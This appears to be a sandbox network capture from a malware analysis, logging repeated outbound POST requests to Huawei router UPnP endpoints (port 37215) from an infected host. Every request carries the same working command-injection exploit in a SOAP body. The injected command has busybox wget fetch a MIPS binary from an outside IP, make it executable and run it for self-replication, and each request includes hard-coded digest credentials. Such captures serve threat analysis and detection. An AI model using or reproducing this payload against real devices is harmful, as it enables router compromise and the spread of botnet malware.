                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1163192.168.2.1350142157.122.172.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.444681883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1164192.168.2.133623241.71.207.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.444714069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1165192.168.2.1352062197.58.133.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.444725037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1166192.168.2.135676641.165.123.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.444806099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1167192.168.2.1341098133.176.23.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445004940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1168192.168.2.1337024197.235.203.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445039988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1169192.168.2.1344218128.23.253.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445060968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1170192.168.2.1354192197.87.190.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445070028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1171192.168.2.1360198157.169.23.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445081949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1172192.168.2.134223841.29.136.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445091963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 